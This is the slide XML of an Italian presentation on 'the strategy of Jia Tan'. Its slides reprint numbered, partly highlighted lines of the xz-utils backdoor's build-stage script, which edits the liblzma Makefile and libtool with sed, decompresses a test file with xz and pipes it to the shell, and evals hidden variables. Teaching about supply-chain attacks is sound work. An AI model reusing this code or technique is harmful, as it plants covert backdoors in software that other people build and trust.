            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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77: fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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78: Q="^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am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__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vpath_adj_setup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 ="</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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79: 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if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 ! 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grep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 -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qs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 "$Q" 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src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/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liblzma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/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Makefile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 &gt; /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dev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/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null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 2&gt;&amp;1;then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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80: exit 0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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81: fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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82: M="^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am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__include = include"</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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83: 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if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 ! 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grep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 -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qs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 "$M" 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src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/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liblzma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/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Makefile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 &gt; /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dev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/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null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 2&gt;&amp;1;then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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84: exit 0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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85: fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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86: L="^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all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: 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all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-recursive$"</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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87: 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if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 ! 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grep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 -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qs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 "$L" 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src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/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liblzma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/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Makefile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 &gt; /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dev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/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null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 2&gt;&amp;1;then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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88: exit 0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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89: fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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90: m="^LTLIBRARIES = \$(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lib_LTLIBRARIES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)"</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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91: 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if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 ! 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grep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 -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qs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 "$m" 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src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/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liblzma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/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Makefile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 &gt; /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dev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/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null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 2&gt;&amp;1;then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="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082286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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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24780D70-F347-5610-235E-C66AB628A92C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107706" y="1564893"/>
            <a:ext cx="11979411" cy="498598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92: exit 0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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93: fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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94: u="AM_V_CCLD = \$(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am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__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v_CCLD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_\$(V))"</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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95: 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if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 ! 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grep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 -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qs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 "$u" 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src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/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liblzma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/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Makefile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 &gt; /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dev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/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null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 2&gt;&amp;1;then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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96: exit 0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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97: fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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98: 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if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 ! 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grep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 -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qs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 "$O" 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libtool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 &gt; /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dev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/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null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 2&gt;&amp;1;then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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99: exit 0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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100: fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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101: 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eval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 $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zrKcTy</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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102: b="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am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__test = $U"</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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103: sed -i "/$j/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i$b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" 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src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/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liblzma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/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Makefile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 || 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true</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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104: d=`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echo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 $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gl_path_map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 | sed 's/\\\/\\\\\\\\/g'`</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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105: b="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am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__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strip_prefix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 = $d"</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>106: sed -i "/$w/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>i$b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>liblzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Makefile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> || </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p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107: b="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am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__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dist_setup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 = \$(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am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__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strip_prefix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) | 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xz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 -d 2&gt;/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dev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/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null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 | \$(SHELL)"</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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108: sed -i "/$E/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i$b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" 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src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/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liblzma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/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Makefile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 || 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true</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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109: b="\$(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top_srcdir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)/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tests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/files/\$(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am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__test)"</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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110: s="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am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__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test_dir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=$b"</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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111: sed -i "/$Q/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i$s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" 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src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/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liblzma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/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Makefile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 || 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true</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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112: h="-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Wl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,--sort-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section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=name,-X"</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>113: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> ! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> "$LDFLAGS" | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>qs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -e "-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>z,now</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>" -e "-z -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Wl,now</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>" &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 2&gt;&amp;1;then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p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114: h=$h",-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z,now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"</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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115: fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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116: j="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liblzma_la_LDFLAGS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 += $h"</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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117: sed -i "/$L/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i$j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" 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src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/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liblzma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/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Makefile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 || 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true</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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118: sed -i "s/$O/$C/g" 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libtool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 || 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true</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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119: k="AM_V_CCLD = @echo -n \$(LTDEPS); \$(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am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__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v_CCLD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_\$(V))"</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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120: sed -i "s/$u/$k/" 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src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/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liblzma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/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Makefile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 || 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true</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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121: l="LTDEPS='\$(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lib_LTDEPS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)'; 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\\\\\n\</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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122: export 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top_srcdir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='\$(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top_srcdir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)'; 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\\\\\n\</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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123: export CC='\$(CC)'; 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\\\\\n\</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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124: export DEFS='\$(DEFS)'; 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\\\\\n\</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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125: export DEFAULT_INCLUDES='\$(DEFAULT_INCLUDES)'; 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  <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>\\\\\n\</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRPr>
          </a:p>
          <a:p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126: export INCLUDES='\$(INCLUDES)'; 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  <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>\\\\\n\</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRPr>
          </a:p>
          <a:p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127: export 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liblzma_la_CPPFLAGS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='\$(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liblzma_la_CPPFLAGS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)'; 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\\\\\n\</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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128: export CPPFLAGS='\$(CPPFLAGS)'; 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\\\\\n\</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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129: export AM_CFLAGS='\$(AM_CFLAGS)'; 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\\\\\n\</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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130: export CFLAGS='\$(CFLAGS)'; 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  <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>\\\\\n\</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRPr>
          </a:p>
          <a:p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131: export AM_V_CCLD='\$(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am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__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v_CCLD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_\$(V))'; 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\\\\\n\</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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132: export 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liblzma_la_LINK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='\$(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liblzma_la_LINK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)'; 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\\\\\n\</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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133: export 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libdir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='\$(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libdir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)'; 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\\\\\n\</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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134: export 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liblzma_la_OBJECTS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='\$(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liblzma_la_OBJECTS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)'; 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\\\\\n\</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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135: export 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liblzma_la_LIBADD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='\$(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liblzma_la_LIBADD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)'; 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\\\\\n\</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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136: sed 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rpath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 \$(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am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__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test_dir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) | \$(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am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__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dist_setup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) &gt;/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dev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/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null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 2&gt;&amp;1";</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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137: sed -i "/$m/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i$l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" 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src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/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liblzma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/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Makefile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 || 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true</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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138: 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eval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 $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zrKcHD</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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139: fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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140: 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elif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 (test -f .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libs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/liblzma_la-crc64_fast.o) &amp;&amp; (test -f .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libs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/liblzma_la-crc32_fast.o); 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then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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141: 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eval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 $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zrKcKQ</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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142: 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if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 ! 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grep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 -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qs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 "$R()" $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top_srcdir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/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src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/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liblzma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/check/crc64_fast.c; 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then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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143: exit 0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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144: fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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2DDAF615-7963-DA9A-D59C-90A084ED2BFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5586577" y="1567683"/>
            <a:ext cx="5914257" cy="507831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145: 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if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 ! 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grep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 -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qs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 "$R()" $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top_srcdir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/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src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/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liblzma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/check/crc32_fast.c; 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then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p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146: exit 0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p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147: fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p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148: 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if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 ! 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grep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 -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qs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 "$R" $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top_srcdir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/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src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/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liblzma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/check/crc_x86_clmul.h; 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then</a:t>
            </a:r>
